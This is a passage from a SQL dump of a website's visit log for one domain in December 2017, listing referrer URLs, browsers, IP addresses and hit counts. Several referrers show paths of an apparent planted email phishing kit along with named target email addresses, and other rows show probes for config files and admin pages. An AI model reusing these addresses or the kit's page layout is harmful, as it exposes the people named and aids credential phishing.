1','000',4,0),(15915,'2017-12-20','https://zphiblgz.org/mailbox/conf.php?email=yiqbal@emaar.ae','MSIE','Windows','10.0','','5.79.68.161','000',2,0),(15916,'2017-12-20','https://zphiblgz.org/mailbox/source/styles.htm?email=yiqbal@emaar.ae','MSIE','Windows','10.0','','77.247.181.163','000',1,0),(15917,'2017-12-20','https://zphiblgz.org/mailbox/thankyou.php?email=yiqbal@emaar.ae','MSIE','Windows','10.0','','185.38.14.171','000',2,0),(15918,'2017-12-20','https://zphiblgz.org/emailpass.zip-extracted/mailer.php?email=yiqbal@emaar.ae','Firefox','Linux','52.0','','84.92.141.223','000',1,0),(15919,'2017-12-20','https://zphiblgz.org/emailpass.zip-extracted/mailer.php?email=yiqbal@emaar.ae','Safari','iPhone','11.0','','173.239.202.69','000',1,0),(15920,'2017-12-20','https://zphiblgz.org/emailpass.zip-extracted/mailer.php?email=yiqbal@emaar.ae','Chrome','Windows','63.0.3239.84','','185.31.172.234','000',1,0),(15921,'2017-12-20','https://zphiblgz.org/emailpass.zip-extracted/manger.php?email=yiqbal@emaar.ae','Firefox','Windows','57.0','','84.92.141.223','000',1,0),(15922,'2017-12-20','https://zphiblgz.org/emailpass.zip-extracted/manger.php?email=yiqbal@emaar.ae','Safari','iPhone','9.0','','46.101.94.163','000',1,0),(15923,'2017-12-20','https://zphiblgz.org/emailpass.zip-extracted/manger.php?email=yiqbal@emaar.ae','Safari','iPhone','9.0','','173.239.202.69','000',1,0),(15924,'2017-12-20','https://zphiblgz.org/mailbox/thankyou.htm?email=yiqbal@emaar.ae','Safari','iPhone','11.0','','79.73.64.239','000',1,0),(15925,'2017-12-20','https://zphiblgz.org/mailbox/thankyou.htm?email=yiqbal@emaar.ae','Firefox','Windows','57.0','','104.236.185.29','000',1,0),(15926,'2017-12-20','https://zphiblgz.org/__MACOSX/mailbox/._post.php?email=yiqbal@emaar.ae','Firefox','Windows','57.0','','196.54.55.16','000',1,0),(15927,'2017-12-20','https://zphiblgz.org/emailpass.zip-extracted/manger.php?email=yiqbal@emaar.ae','AppleWebKit','Windows','534','','82.102.27.75','000',1,0),(15928,'2017-12-20','https://zphiblgz.org/__MACOSX/mailbox/._post.php?email=yiqbal@emaar.ae','Safari','iPhone','7.0','','79.73.64.239','000',1,0),(15929,'2017-12-20','https://zphiblgz.org/mailbox/thankyou.htm?email=yiqbal@emaar.ae','Firefox','Windows','57.0','','188.166.63.71','000',1,0),(15930,'2017-12-20','https://zphiblgz.org/mailbox/thankyou.htm?email=yiqbal@emaar.ae','Chrome','Android','38.0.1025.166','','196.54.55.16','000',1,0),(15931,'2017-12-20','https://zphiblgz.org/emailpass.zip-extracted/mailer.php?email=yiqbal@emaar.ae','Edge','Windows','14.14393','','185.31.172.234','000',1,0),(15932,'2017-12-20','https://zphiblgz.org/__MACOSX/mailbox/._post.php?email=yiqbal@emaar.ae','Chrome','Windows','62.0.3202.94','','178.32.61.6','000',1,0),(15933,'2017-12-20','https://zphiblgz.org','Java','Unknown','1.6.0','','69.164.111.198','000',28,0),(15934,'2017-12-20','https://zphiblgz.org','Chrome','Windows','41.0.2224.3','','50.19.154.226','000',1,0),(15935,'2017-12-20','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','69.175.104.98','000',2,0),(15936,'2017-12-20','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','73.200.184.133','000',11,0),(15937,'2017-12-20','https://zphiblgz.org','Firefox','Windows','34.0','','78.29.13.199','000',1,0),(15938,'2017-12-20','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','66.27.211.197','000',15,0),(15939,'2017-12-20','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.196.40','000',1,0),(15940,'2017-12-20','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.195.134','000',1,0),(15941,'2017-12-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(15942,'2017-12-20','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(15943,'2017-12-20','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.158','000',1,0),(15944,'2017-12-20','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.129','000',3,0),(15945,'2017-12-20','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.136','000',1,0),(15946,'2017-12-20','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.138','000',1,0),(15947,'2017-12-20','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.131','000',1,0),(15948,'2017-12-20','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.128','000',1,0),(15949,'2017-12-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','13.84.34.149','000',1,0),(15950,'2017-12-20','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','73.133.254.145','000',9,0),(15951,'2017-12-20','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.84','','50.225.39.69','000',5,0),(15952,'2017-12-20','https://zphiblgz.org/mailbox/loading.php?Email=psw@gsconst.co.kr&.rand=13InboxLight.aspx?n=1774256418&fid=4#n=1252899642&fid=1&fav=1','MSIE','Windows','7.0','','165.243.40.159','000',1,0),(15953,'2017-12-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','209.54.58.185','000',1,0),(15954,'2017-12-20','http://search.yahoo.co.jp/','MSIE','Windows','11.0','','153.212.59.3','000',2,0),(15955,'2017-12-20','https://zphiblgz.org','Chrome','Macintosh','38.0.2158.70','','23.94.84.122','000',2,0),(15956,'2017-12-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','72.14.199.128','000',2,0),(15957,'2017-12-20','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','50.87.249.160','000',2,0),(15958,'2017-12-20','http://zphiblgz.org/wp-config-85528777.php','Firefox','Windows','33.0','','159.203.81.93','000',1,0),(15959,'2017-12-20','https://www.google.co.jp/','Chrome','Windows','63.0.3239.84','','218.228.195.230','000',1,0),(15960,'2017-12-20','https://www.google.com/','Chrome','Windows','62.0.3202.94','','64.233.172.163','000',1,0),(15961,'2017-12-20','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','62.0.3202.94','','64.233.172.168','000',1,0),(15962,'2017-12-20','https://www.google.com/','Chrome','Windows','62.0.3202.94','','66.102.8.38','000',1,0),(15963,'2017-12-20','http://zphiblgz.org/cache/hot18','Chrome','Windows','62.0.3202.94','','66.102.8.42','000',1,0),(15964,'2017-12-20','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','165.227.202.144','000',1,0),(15965,'2017-12-20','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','183.11.128.206','000',3,0),(15966,'2017-12-20','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.112','000',1,0),(15967,'2017-12-20','http://search.yahoo.co.jp/','MSIE','Windows','11.0','','221.184.129.146','000',1,0),(15968,'2017-12-20','https://zphiblgz.org/mailbox/loading.php?Email=business@drugdu.com&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','63.0.3239.84','','14.20.89.85','000',2,0),(15969,'2017-12-20','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','73.177.190.106','000',2,0),(15970,'2017-12-20','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(15971,'2017-12-20','http://zphiblgz.org/','MSIE','Windows','10.0','','93.115.95.202','000',1,0),(15972,'2017-12-20','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','106.241.135.22','000',2,0),(15973,'2017-12-20','https://zphiblgz.org','MSIE','Windows','8.0','','50.19.154.226','000',1,0),(15974,'2017-12-20','https://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',2,0),(15975,'2017-12-20','https://zphiblgz.org','MSIE','Windows','6.0','','45.55.224.77','000',2,0),(15976,'2017-12-21','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',633,0),(15977,'2017-12-21','https://zphiblgz.org','MSIE','Windows','7.0','','104.245.34.75','000',1,0),(15978,'2017-12-21','http://site.ru','Chrome','Windows','5.0.375.99','','173.254.28.81','000',2,0),(15979,'2017-12-21','https://zphiblgz.org','MSIE','Windows','11.0','','27.110.42.12','000',2,0),(15980,'2017-12-21','https://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',1,0),(15981,'2017-12-21','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.165','000',1,0),(15982,'2017-12-21','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(15983,'2017-12-21','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','163.172.4.153','000',1,0),(15984,'2017-12-21','https://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(15985,'2017-12-21','https://zphiblgz.org','Firefox','Windows','53.0','','192.198.80.227','000',1,0),(15986,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.164','000',1,0),(15987,'2017-12-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(15988,'2017-12-21','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','198.20.107.42','000',2,0),(15989,'2017-12-21','http://site.ru','Chrome','Windows','5.0.375.99','','198.199.81.195','000',1,0),(15990,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.219.3.48','000',2,0),(15991,'2017-12-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','171.25.193.235','000',1,0),(15992,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',1,0),(15993,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.77','000',2,0),(15994,'2017-12-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','209.54.58.185','000',2,0),(15995,'2017-12-21','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','159.203.93.103','000',20,0),(15996,'2017-12-21','https://zphiblgz.org','Chrome','Linux','50.0.2661.75','','34.223.205.80','000',2,0),(15997,'2017-12-21','http://zphiblgz.org/','Chrome','Macintosh','57.0.2987.133','','62.149.29.40','000',2,0),(15998,'2017-12-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','165.227.117.27','000',21,0),(15999,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.81.183','000',2,0),(16000,'2017-12-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.212.115','000',1,0),(16001,'2017-12-21','http://site.ru','Chrome','Windows','5.0.375.99','','50.87.144.173','000',1,0),(16002,'2017-12-21','https://zphiblgz.org','Firefox','Windows','40.1','','31.46.190.147','000',3,0),(16003,'2017-12-21','https://zphiblgz.org','Chrome','Linux','50.0.2661.75','','34.212.252.194','000',2,0),(16004,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','173.254.216.66','000',1,0),(16005,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.32.51.225','000',1,0),(16006,'2017-12-21','https://zphiblgz.org','MSIE','Windows','7.0','','104.245.35.158','000',1,0),(16007,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.107.85.62','000',2,0),(16008,'2017-12-21','https://zphiblgz.org','Firefox','Windows','40.1','','117.216.22.53','000',2,0),(16009,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.202','000',2,0),(16010,'2017-12-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','207.244.70.35','000',1,0),(16011,'2017-12-21','http://kredit-blog.ru/nuzhno-znat/info/karty-tinkoff-bank-vsegda-luchshie-usloviya.html','MSIE','Windows','6.0','','134.249.52.116','000',5,0),(16012,'2017-12-21','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','103.254.155.182','000',2,0),(16013,'2017-12-21','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','50.225.39.88','000',5,0),(16014,'2017-12-21','http://xtremeeagles.net/','MSIE','Windows','6.0','','188.163.73.8','000',6,0),(16015,'2017-12-21','http://coolwallpapers-hd.com/','MSIE','Windows','6.0','','46.118.121.38','000',2,0),(16016,'2017-12-21','https://zphiblgz.org','Firefox','Windows','34.0','','178.92.78.94','000',1,0),(16017,'2017-12-21','https://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',2,0),(16018,'2017-12-21','https://zphiblgz.org','Firefox','Windows','21.0','','144.76.168.111','000',1,0),(16019,'2017-12-21','https://zphiblgz.org','Firefox','Linux','17.0','','5.9.94.207','000',1,0),(16020,'2017-12-21','https://zphiblgz.org','Firefox','Windows','21.0','','148.251.54.44','000',1,0),(16021,'2017-12-21','http://zphiblgz.org/roots.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(16022,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.86.162','000',1,0),(16023,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',1,0),(16024,'2017-12-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.100.84.108','000',1,0),(16025,'2017-12-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(16026,'2017-12-21','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(16027,'2017-12-21','http://chocolateslim-en-espana.com/','MSIE','Windows','6.0','','134.249.64.243','000',2,0),(16028,'2017-12-21','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','73.133.254.145','000',1,0),(16029,'2017-12-21','https://l.facebook.com/','Firefox','Windows','57.0','','76.80.85.162','000',3,0),(16030,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.195.250.77','000',1,0),(16031,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.105.116','000',2,0),(16032,'2017-12-21','http://zphiblgz.org/scholarship/','Chrome','Macintosh','63.0.3239.84','','71.121.235.184','000',3,0),(16033,'2017-12-21','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.139.222','000',1,0),(16034,'2017-12-21','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.195.134','000',1,0),(16035,'2017-12-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','205.201.132.14','000',3,0),(16036,'2017-12-21','https://zphiblgz.org','Firefox','Windows','57.0','','100.36.64.108','000',4,0),(16037,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.20.55.16','000',2,0),(16038,'2017-12-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','23.129.64.101','000',1,0),(16039,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.18','000',1,0),(16040,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','104.236.141.156','000',1,0),(16041,'2017-12-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','23.129.64.102','000',1,0),(16042,'2017-12-21','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','103.23.201.243','000',2,0),(16043,'2017-12-21','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(16044,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',2,0),(16045,'2017-12-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.54.136','000',1,0),(16046,'2017-12-21','https://zphiblgz.org','Firefox','Windows','7.0.1','','96.255.14.191','000',2,0),(16047,'2017-12-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','91.109.176.6','000',1,0),(16048,'2017-12-21','https://zphiblgz.org/mailbox/loading.php?Email=info@campaint-ccsc.com.kh&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','16.16299','','43.230.194.160','000',1,0),(16049,'2017-12-22','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',921,0),(16050,'2017-12-22','https://www.timer4web.com/','Firefox','Windows','55','','148.251.190.210','000',6,0),(16051,'2017-12-22','https://zphiblgz.org','Firefox','Windows','7.0.1','','45.62.253.113','000',2,0),(16052,'2017-12-22','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.163.155.202','000',1,0),(16053,'2017-12-22','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.36.27.6','000',1,0),(16054,'2017-12-22','https://vikistars.com/','MSIE','Windows','6.0','','46.118.157.50','000',3,0),(16055,'2017-12-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',4,0),(16056,'2017-12-22','https://zphiblgz.org','Firefox','Windows','7.0.1','','200.122.181.101','000',2,0),(16057,'2017-12-22','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.36.27.7','000',1,0),(16058,'2017-12-22','http://www.google.com/url?sa=t&rct=j&q=zphiblgz.org&source=web&cd=5&ved=0CF0QFjAE&url=http:%2F%2Fzphiblgz.org%2F&cad=rja','Lynx','Unknown','2.8.5rel.1','','78.158.28.10','000',1,0),(16059,'2017-12-22','http://site.ru','Chrome','Windows','5.0.375.99','','62.210.185.4','000',4,0),(16060,'2017-12-22','https://www.google.com/','Chrome','Windows','62.0.3202.94','','66.102.6.4','000',1,0),(16061,'2017-12-22','https://www.google.com/','Chrome','Windows','62.0.3202.94','','66.102.6.6','000',1,0),(16062,'2017-12-22','http://zphiblgz.org/cache/hot18','Chrome','Windows','62.0.3202.94','','66.102.6.8','000',2,0),(16063,'2017-12-22','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(16064,'2017-12-22','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','69.195.124.145','000',2,0),(16065,'2017-12-22','http://nosecret.com.ua/','MSIE','Windows','6.0','','134.249.52.116','000',3,0),(16066,'2017-12-22','http://site.ru','Chrome','Windows','5.0.375.99','','185.119.175.252','000',2,0),(16067,'2017-12-22','http://copenergo.ru/publikatsii/preimuschestva-i-nedostatki-karty-tinkoff.html','MSIE','Windows','6.0','','188.163.73.8','000',2,0),(16068,'2017-12-22','http://site.ru','Chrome','Windows','5.0.375.99','','195.128.174.138','000',2,0),(16069,'2017-12-22','http://site.ru','Chrome','Windows','5.0.375.99','','198.154.249.85','000',2,0),(16070,'2017-12-22','https://zphiblgz.org','Tor','Windows','Unknown','','213.233.57.134','000',1,0),(16071,'2017-12-22','https://zphiblgz.org','B-l-i-t-z-B-O-T','iPhone','4.3','','186.47.46.6','000',1,0),(16072,'2017-12-22','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.242.225','000',1,0),(16073,'2017-12-22','https://zphiblgz.org','Chrome','Windows','19.19','','175.139.252.193','000',1,0),(16074,'2017-12-22','https://zphiblgz.org','Internet','Unknown','Unknown','','118.193.107.119','000',1,0),(16075,'2017-12-22','https://zphiblgz.org','Chrome','Windows','19.19','','211.245.62.111','000',1,0),(16076,'2017-12-22','https://zphiblgz.org','Internet','Unknown','Unknown','','109.121.163.75','000',1,0),(16077,'2017-12-22','https://zphiblgz.org','Mobile','Windows','11.1','','139.209.90.50','000',1,0),(16078,'2017-12-22','https://zphiblgz.org','SeaMonkey','Linux','13.17','','120.199.64.165','000',1,0),(16079,'2017-12-22','https://zphiblgz.org','Mobile','Windows','11.1','','203.146.82.253','000',1,0),(16080,'2017-12-22','https://zphiblgz.org','Chrome','Unknown','12.15','','47.89.41.164','000',1,0),(16081,'2017-12-22','https://zphiblgz.org','SeaMonkey','iPad','1.14','','211.245.62.111','000',1,0),(16082,'2017-12-22','https://zphiblgz.org','TenFourFox','iPhone','5.7','','118.193.107.119','000',1,0),(16083,'2017-12-22','https://zphiblgz.org','Dragon','Linux','18.18','','110.77.172.222','000',1,0),(16084,'2017-12-22','https://zphiblgz.org','Dragon','Linux','18.18','','116.199.115.78','000',1,0),(16085,'2017-12-22','https://zphiblgz.org','Dragon','Linux','18.18','','185.82.201.114','000',1,0),(16086,'2017-12-22','https://zphiblgz.org','Dragon','Linux','18.18','','118.114.77.47','000',1,0),(16087,'2017-12-22','https://zphiblgz.org','IBrowse','Linux','19.0','','74.121.148.254','000',1,0),(16088,'2017-12-22','https://zphiblgz.org','Safari','Unknown','2.11','','36.80.189.67','000',1,0),(16089,'2017-12-22','https://zphiblgz.org','Seamonkey','Unknown','8.15','','122.183.242.54','000',1,0),(16090,'2017-12-22','https://zphiblgz.org','Netscape','iPhone','17.10','','47.52.61.212','000',1,0),(16091,'2017-12-22','https://zphiblgz.org','Firefox','Windows','34.0','','109.172.58.73','000',1,0),(16092,'2017-12-22','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','54.37.22.223','000',2,0),(16093,'2017-12-22','https://zphiblgz.org','MSIE','Windows','11.0','','195.141.89.140','000',1,0),(16094,'2017-12-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(16095,'2017-12-22','https://zphiblgz.org/mailbox/loading.php?Email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','15.15063','','40.112.191.7','000',1,0),(16096,'2017-12-22','http://onlineporno.site/','Unknown','Unknown','Unknown','','178.137.94.65','000',2,0),(16097,'2017-12-22','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1643.jOHvq7qfGUupWJi6sJi5G54cOa7n68jQqDRF-4JgFglEuSzxzxVFOkt8kZipYipy.abd124a585899766cb3ca5699334cf450f41dba8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVlE5M1MxRWZoT3pST1dubmxQVDUzV3dRRW14cnZ0ZmNJMGY2Q2IyRmlQWk4zWjBpTFk4b3NR&b64e=2&sign=c69b34622497021b48f6119d9f79a811&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbaAYjRIWsvPWcP0RvPFLp3xri9EJmD7uXEjJmxH8kY6qILqmb_n299yKVTjabq9hGgeKa_OfYenZ4N0cppOb7s_OUq1g2Cj8O7J55RslLvA_ch8UCMOMr80N5LBSoX2Plm&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX5No9jVno6g38Oi9lFW9lqnjzNMChHcS1_IbgYOBlqO4qtk2_I5RwCe1nD_U0ns-GmIuWNmgF-Yg&l10n=ru&cts=1513970494048&mc=3.08209922065','Chrome','Windows','61.0.3163.100','','176.192.179.64','000',2,0),(16098,'2017-12-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(16099,'2017-12-22','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(16100,'2017-12-22','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','89.163.209.232','000',2,0),(16101,'2017-12-22','https://zphiblgz.org','MSIE','Windows','6.0','','104.42.198.99','000',2,0),(16102,'2017-12-22','http://lovi-moment.com.ua/','MSIE','Windows','6.0','','188.163.77.53','000',1,0),(16103,'2017-12-22','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.142','000',1,0),(16104,'2017-12-22','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.102.3','000',2,0),(16105,'2017-12-22','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.178','000',1,0),(16106,'2017-12-22','https://zphiblgz.org','Firefox','Linux','3.5.9','','91.121.70.58','000',1,0),(16107,'2017-12-22','https://zphiblgz.org','Firefox','Windows','34.0','','185.48.36.141','000',1,0),(16108,'2017-12-22','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','132.148.195.246','000',2,0),(16109,'2017-12-22','https://zphiblgz.org','Firefox','Windows','40.1','','171.234.195.109','000',3,0),(16110,'2017-12-22','https://zphiblgz.org','MSIE','Windows','7.0','','39.110.234.119','000',1,0),(16111,'2017-12-22','https://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(16112,'2017-12-22','https://zphiblgz.org','Firefox','Windows','12.0','','88.198.43.207','000',1,0),(16113,'2017-12-22','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','100.16.190.173','000',2,0),(16114,'2017-12-22','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.84','','71.121.235.184','000',4,0),(16115,'2017-12-23','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',517,0),(16116,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','54.247.187.243','000',3,0),(16117,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','173.254.48.85','000',2,0),(16118,'2017-12-23','https://zphiblgz.org','MSIE','Windows','7.0','','39.110.234.114','000',1,0),(16119,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','178.210.90.90','000',2,0),(16120,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',2,0),(16121,'2017-12-23','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','13.67.139.132','000',1,0),(16122,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',1,0),(16123,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','31.185.104.21','000',1,0),(16124,'2017-12-23','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.179','000',1,0),(16125,'2017-12-23','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(16126,'2017-12-23','http://zphiblgz.org/','MSIE','Windows','11.0','','82.103.133.54','000',1,0),(16127,'2017-12-23','https://zphiblgz.org','Safari','Macintosh','11.0','','184.168.46.82','000',1,0),(16128,'2017-12-23','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','184.168.46.82','000',1,0),(16129,'2017-12-23','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','13.67.141.98','000',1,0),(16130,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','93.125.99.48','000',1,0),(16131,'2017-12-23','http://chocolateslim-en-france.com/','MSIE','Windows','6.0','','134.249.64.243','000',3,0),(16132,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','119.59.104.18','000',2,0),(16133,'2017-12-23','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','74.220.215.77','000',2,0),(16134,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','217.147.92.3','000',1,0),(16135,'2017-12-23','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.166','000',2,0),(16136,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','104.131.19.25','000',2,0),(16137,'2017-12-23','https://zphiblgz.org','MSIE','Windows','7.0','','122.208.206.218','000',1,0),(16138,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.77','000',1,0),(16139,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.76','000',2,0),(16140,'2017-12-23','http://excitacao.com/','MSIE','Windows','5.5','','134.249.52.116','000',3,0),(16141,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','23.129.64.101','000',2,0),(16142,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','166.62.119.173','000',3,0),(16143,'2017-12-23','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','100.15.160.57','000',4,0),(16144,'2017-12-23','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','41.200.141.82','000',7,0),(16145,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.12','000',2,0),(16146,'2017-12-23','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.195.250.77','000',1,0),(16147,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','64.27.17.140','000',1,0),(16148,'2017-12-23','https://zphiblgz.org','Safari','Windows','5.0.2','','88.198.43.207','000',2,0),(16149,'2017-12-23','https://zphiblgz.org/adm/','Firefox','Windows','3.5.2','','41.200.141.82','000',22,0),(16150,'2017-12-23','https://zphiblgz.org','Safari','iPhone','11.0','','65.191.71.233','000',3,0),(16151,'2017-12-23','http://sexsaoy.com/','MSIE','Windows','5.5','','178.137.94.65','000',1,0),(16152,'2017-12-23','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(16153,'2017-12-23','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','149.56.132.180','000',2,0),(16154,'2017-12-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',6,0),(16155,'2017-12-23','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(16156,'2017-12-23','https://search.yahoo.com/','Chrome','Windows','63.0.3239.84','','73.129.21.43','000',3,0),(16157,'2017-12-23','https://zphiblgz.org','Safari','iPhone','9.0','','123.14.126.186','000',1,0),(16158,'2017-12-23','https://zphiblgz.org','Safari','iPhone','9.0','','106.45.0.224','000',1,0),(16159,'2017-12-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',1,0),(16160,'2017-12-23','https://zphiblgz.org','Chrome','Windows','24.0.1312.70','','194.81.79.63','000',8,0),(16161,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(16162,'2017-12-23','http://zphiblgz.org/','Firefox','Windows','7.0.1','','94.130.28.151','000',1,0),(16163,'2017-12-23','https://zphi